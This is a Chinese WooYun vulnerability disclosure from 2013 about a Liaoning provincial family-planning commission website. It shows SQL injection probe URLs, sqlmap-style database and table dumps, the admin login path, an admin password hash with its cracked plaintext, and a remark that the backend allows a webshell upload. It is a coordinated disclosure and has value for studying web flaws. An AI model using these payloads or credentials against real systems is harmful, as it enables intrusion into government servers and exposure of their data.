当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-041328

漏洞标题:辽宁计生委SQL注入及弱口令导致后台可入

相关厂商:辽宁计生委

漏洞作者: 雅柏菲卡

提交时间:2013-10-29 10:40

修复时间:2013-12-13 10:41

公开时间:2013-12-13 10:41

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:8

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-10-29: 细节已通知厂商并且等待厂商处理中
2013-11-02: 厂商已经确认,细节仅向厂商公开
2013-11-12: 细节向核心白帽子及相关领域专家公开
2013-11-22: 细节向普通白帽子公开
2013-12-02: 细节向实习白帽子公开
2013-12-13: 细节向公众公开

简要描述:

......................

详细说明:

......................

漏洞证明:

sql配置失误
当输入'时
http://www.lnrkjsw.gov.cn/web/content_hd.do?id=21922'
的提示
攻击政府网站违法,您的ip已记录在案,系统自动将攻击详细记录提交到网警部门!我们保留追究的权利!
若输入 and 1=2 提示
错误 '80020009'
/web/content_hd.do,行 71
http://www.lnrkjsw.gov.cn/web/content_hd.do?id=21922%20and%201=2
当然了
http://www.lnrkjsw.gov.cn/web/content_hd.do?id=21922%20and%201=1是正常页面

sql注入

Target: 		http://www.lnrkjsw.gov.cn/web/content_hd.do?id=21922
Host IP: 218.60.144.144
Web Server: Microsoft-IIS/6.0
Powered-by: ASP.NET
DB Server: MSSQL 2005 with error
Resp. Time(avg): 406 ms
Current User: jishengwei
Sql Version: Microsoft SQL Server 2000 - 8.00.2039 (Intel X86)
May 3 2005 23:18:38
Copyright (c) 1988-2003 Microsoft Corporation
Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 2)
Current DB: jsw2010
System User: jishengwei
Host Name: JSW
Server Name: JSW
jsw2010
Data Bases: master
tempdb
model
msdb
pubs
Northwind
jsw2010
count
jsw2010
Data Bases: master
tempdb
model
msdb
pubs
Northwind
jsw2010
count
sqlmap 的解表
available databases [8]:
[*] count
[*] jsw2010
[*] master
[*] model
[*] msdb
[*] Northwind
[*] pubs
[*] tempdb
Database: jsw2010
[110 tables]
+---------------------------+
| dbo.PE_AdZone |
| dbo.PE_Admin |
| dbo.PE_Advertisement |
| dbo.PE_Announce |
| dbo.PE_AreaCollection |
| dbo.PE_Article |
| dbo.PE_Article11 |
| dbo.PE_Author |
| dbo.PE_Bank |
| dbo.PE_BankrollItem |
| dbo.PE_Card |
| dbo.PE_Channel |
| dbo.PE_City |
| dbo.PE_Class |
| dbo.PE_Class11 |
| dbo.PE_Classroom |
| dbo.PE_Client |
| dbo.PE_Comment |
| dbo.PE_Company |
| dbo.PE_ComplainItem |
| dbo.PE_Config |
| dbo.PE_ConsumeLog |
| dbo.PE_Contacter |
| dbo.PE_CopyFrom |
| dbo.PE_Country |
| dbo.PE_DeliverCharge |
| dbo.PE_DeliverItem |
| dbo.PE_DeliverType |
| dbo.PE_Dictionary |
| dbo.PE_DownError |
| dbo.PE_DownServer |
| dbo.PE_Equipment |
| dbo.PE_Favorite |
| dbo.PE_Field |
| dbo.PE_Filters |
| dbo.PE_Friend |
| dbo.PE_FriendSite |
| dbo.PE_FsKind |
| dbo.PE_GuestBook |
| dbo.PE_GuestKind |
| dbo.PE_HistrolyNews |
| dbo.PE_HouseArea |
| dbo.PE_HouseCS |
| dbo.PE_HouseCZ |
| dbo.PE_HouseConfig |
| dbo.PE_HouseHZ |
| dbo.PE_HouseQG |
| dbo.PE_HouseQZ |
| dbo.PE_InfoS |
| dbo.PE_InvoiceItem |
| dbo.PE_Item |
| dbo.PE_JobCategory |
| dbo.PE_JsFile |
| dbo.PE_KeyLink |
| dbo.PE_Label |
| dbo.PE_Log |
| dbo.PE_MailChannel |
| dbo.PE_Message |
| dbo.PE_NewKeys |
| dbo.PE_OrderForm |
| dbo.PE_OrderFormItem |
| dbo.PE_Page |
| dbo.PE_PageClass |
| dbo.PE_PayPlatform |
| dbo.PE_Payment |
| dbo.PE_PaymentType |
| dbo.PE_Photo |
| dbo.PE_Position |
| dbo.PE_PositionSupplyInfo |
| dbo.PE_PresentProject |
| dbo.PE_Producer |
| dbo.PE_Product |
| dbo.PE_Province |
| dbo.PE_RechargeLog |
| dbo.PE_Resume |
| dbo.PE_ServiceItem |
| dbo.PE_ShoppingCarts |
| dbo.PE_Skin |
| dbo.PE_Soft |
| dbo.PE_Space |
| dbo.PE_SpaceBook |
| dbo.PE_SpaceComment |
| dbo.PE_SpaceDiary |
| dbo.PE_SpaceKind |
| dbo.PE_SpaceLink |
| dbo.PE_SpaceMusic |
| dbo.PE_SpacePhoto |
| dbo.PE_SpaceVisitor |
| dbo.PE_Special |
| dbo.PE_SubCompany |
| dbo.PE_Supply |
| dbo.PE_Supply_Company |
| dbo.PE_Survey |
| dbo.PE_SurveyAnswer |
| dbo.PE_SurveyInput |
| dbo.PE_SurveyQuestion |
| dbo.PE_Template |
| dbo.PE_TemplateProject |
| dbo.PE_Trademark |
| dbo.PE_TransferItem |
| dbo.PE_UsedDetail |
| dbo.PE_User |
| dbo.PE_UserGroup |
| dbo.PE_Vote |
| dbo.PE_WorkPlace |
| dbo.dtproperties |
| dbo.netservices |
| dbo.sysconstraints |
| dbo.syssegments |
| dbo.tongji |
+---------------------------+
Database: jsw2010
Table: dbo.PE_Admin
[31 columns]
+------------------------+----------+
| Column | Type |
+------------------------+----------+
| AdminName | bit |
| AdminPurview_Article | bit |
| AdminPurview_GuestBook | bit |
| AdminPurview_House | bit |
| AdminPurview_Job | bit |
| AdminPurview_Others | bit |
| AdminPurview_Photo | bit |
| AdminPurview_Shop | bit |
| AdminPurview_Soft | bit |
| AdminPurview_Supply | bit |
| arrClass_Check | bit |
| arrClass_GuestBook | bit |
| arrClass_House | bit |
| arrClass_Input | bit |
| arrClass_Manage | bit |
| arrClass_View | bit |
| Count_Add | bit |
| Count_Check | bit |
| Count_Reject | bit |
| EnableMultiLogin | bit |
| ID | datetime |
| LastLoginIP | datetime |
| LastLoginTime | datetime |
| LastLogoutTime | datetime |
| LoginTimes | int |
| Password | int |
| Purview | int |
| RndPassword | nvarchar |
| RoleName | nvarchar |
| topname | nvarchar |
| UserName | nvarchar |
+------------------------+----------+
pangolin的解表

QQ截图20131029035721.jpg


后台被猜解
http://www.lnrkjsw.gov.cn/admin/admin_login.asp


弱口令
用户名:admin
密码:f64793875b2204cf (通过解码得到明文密码 admin888888)


后台可入 并且可修改上传类型可getshell

QQ截图20131029040255.jpg

修复方案:

版权声明:转载请注明来源 雅柏菲卡@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2013-11-02 19:57

厂商回复:

最新状态:

暂无